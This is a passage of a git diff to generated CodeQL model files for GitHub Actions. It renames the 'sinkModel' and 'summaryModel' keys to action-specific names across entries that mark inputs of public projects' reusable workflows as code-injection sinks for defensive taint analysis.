@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gittools/gitversion/.github/workflows/_artifacts_linux.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml index 3d3a4de2946..5afda471f8b 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules/.github/workflows/build-downstream.yml", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml index 4c58af6969d..4e5ca50ccec 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "input.path", "code-injection", "generated"] - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "input.name", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml index 8629f279891..02801615bd5 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gravitational/teleport/.github/workflows/update-ami-ids.yaml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml index 4a6bbd77ec9..d808d612857 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gravitl/netmaker/.github/workflows/publish-docker.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml index c22998ee52a..e543dc8b7f3 100644 --- a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.build-version", "code-injection", "generated"] - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.wave-app-name", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml index c74922e61dc..891d902f470 100644 --- a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "input.dry-run", "code-injection", "generated"] - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml index c9c7e8318f7..334d64dfbec 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml", "*", "input.version", "output.docker-image-tag", "taint", "manual"] - ["hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml", "*", "input.version", "output.docker-image", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml index 169094c3eb3..2c600cd7f7d 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/boundary/.github/workflows/test-cli-ui_oss.yml", "*", "input.artifact-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml index 6e4e4f4f1e9..cc6c4e620e6 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "input.package-names-command", "code-injection", "generated"] - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "input.go-test-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml index dbc26ef9f04..efbf050ddc9 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/terraform-cdk/.github/workflows/unit.yml", "*", "input.package", "code-injection", "generated"] - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.gitUser", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml index c69de7cfcc2..9860bd3ab92 100644 
--- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/terraform-provider-tfe/.github/workflows/jira-issue-sync.yml", "*", "input.issue-extra-fields", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml index 685b0b144c9..c160c29f6f6 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.product-version", "code-injection", "generated"] - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.package-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml index 9e3fc5cdc4f..910715eece0 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.sample-max", "code-injection", "generated"] - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.sample-name", "code-injection", "generated"] 
@@ -16,7 +16,7 @@ extensions: - ["hashicorp/vault/.github/workflows/test-enos-scenario-ui.yml", "*", "input.storage_backend", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["hashicorp/vault/.github/workflows/build-artifacts-ce.yml", "*", "input.vault-version-package", "output.testable-packages", "taint", "manual"] - ["hashicorp/vault/.github/workflows/build-artifacts-ce.yml", "*", "input.vault-revision", "output.testable-containers", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml index 4cd6cd8f591..f04e67670d3 100644 --- a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["heroku/cli/.github/workflows/publish-npm.yml", "*", "input.isStableRelease", "code-injection", "generated"] - ["heroku/cli/.github/workflows/promote.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml index 01726410e18..3d5fa057987 100644 --- a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml 
@@ -1,13 +1,13 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.project_name", "code-injection", "generated"] - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.dependency_track_url", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.stage", "output.release_stage", "taint", "manual"] - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.repository", "output.repo_url", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml index 90e61bcf11a..31d0e691e7f 100644 --- a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["home-assistant/operating-system/.github/workflows/test.yaml", "*", "input.version", "code-injection", "generated"] - ["home-assistant/operating-system/.github/workflows/artifacts-index.yaml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml index b4e1ff8155a..5f9da314f90 100644 --- a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.windowsBuildArgs", "code-injection", "generated"] - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.bazelBuildArgs", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml index 3621105b74e..7ae494adb2b 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.package_name", "code-injection", "generated"] - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.repo_owner", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml index b6660df1c9b..dce969719d2 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "input.folder_slices", "code-injection", "generated"] - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "input.setup_status", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml index ead0bcfab16..cd5d5ff7d0f 100644 --- a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.pull_request_number", "code-injection", "generated"] - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.qt_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml index 6f9a12e9069..fd17e601d80 100644 --- a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ibm/sarama/.github/workflows/fvt.yml", "*", "input.kafka-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml index 8ac32e4a7b7..bed40dce429 100644 --- a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["icloud-photos-downloader/icloud_photos_downloader/.github/workflows/build-package.yml", "*", "input.icloudpd_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml index 3c21fcad386..62a12e47138 100644 --- a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["immich-app/immich/.github/workflows/build-mobile.yml", "*", "input.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml index e0d2508932f..7491c4f951a 100644 --- a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["inria/spoon/.github/workflows/jreleaser.yml", "*", "input.release-script-to-run", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml index 96830183506..1876f1146cb 100644 --- a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["intel/intel-device-plugins-for-kubernetes/.github/workflows/lib-publish.yaml", "*", "input.image_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml index 7f9299eb4d3..4a8534429f9 100644 --- a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["inverse-inc/packetfence/.github/workflows/reusable_upload_packages.yml", "*", "input._PACKAGE_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml index 7a79d4c1e09..ecac3f22f85 100644 --- a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ispc/ispc/.github/workflows/reusable.rebuild.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml index 55888f48551..ffc4193edbf 100644 --- a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jetbrains/intellij-platform-gradle-plugin/.github/workflows/reusable-single-unitTest.yml", "*", "input.gradleVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml index ea453ec4811..93b29308ff2 100644 --- a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.image", "code-injection", "generated"] - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.variant", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml index 39005b693e7..c5965c5d8ef 100644 --- a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kairos-io/kairos/.github/workflows/reusable-zfs-test.yaml", "*", "input.flavor", "code-injection", "generated"] - ["kairos-io/kairos/.github/workflows/reusable-upgrade-with-cli-test.yaml", "*", "input.flavor_release", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml index 4b485083191..1fc5159e55a 100644 
--- a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kanidm/kanidm/.github/workflows/kanidm_individual_book.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml index f45709cfa0f..bce14a98edd 100644 --- a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kata-containers/kata-containers/.github/workflows/release-s390x.yaml", "*", "input.target-arch", "code-injection", "generated"] - ["kata-containers/kata-containers/.github/workflows/release-ppc64le.yaml", "*", "input.target-arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml index 1d8dc84c2f0..0439d6e1d4c 100644 --- a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.build_mode", "code-injection", "generated"] - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.release_branch", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml index f404aa73762..357e11b3c0b 100644 --- a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kotest/kotest/.github/workflows/run-gradle.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml index 2f546ce3f57..4d3ea1e9156 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-k8s-e2e.yaml", "*", "input.k8s-version", "code-injection", "generated"] - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-images.yaml", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml index 9e8b1e43993..44b905cab67 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.image_tag", "code-injection", "generated"] - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.image_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml index 20a24a4ec7f..192d975ea57 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "code-injection", "generated"] - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.release-branch", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "output.new-version", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml index 666a86caf88..627fca5d3ff 100644 --- a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "input.VERSION_NAME", "code-injection", "generated"] - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "input.REGISTRY", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml index d4926952f1a..4d4fd0f229e 100644 --- a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["labring/sealos/.github/workflows/services.yml", "*", "input.push_image_tag", "code-injection", "generated"] - ["labring/sealos/.github/workflows/services.yml", "*", "input.push_image", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml index 144c16ff8de..1ceacd2f1c0 100644 --- a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["laion-ai/open-assistant/.github/workflows/docker-build.yaml", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml index f97ee81bcb9..ba0f5c06a67 100644 --- a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "input.release_id", "code-injection", "generated"] - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "input.filename", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml index 401875059ec..3c8f11dd0cd 100644 --- a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lensesio/stream-reactor/.github/workflows/build.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml index 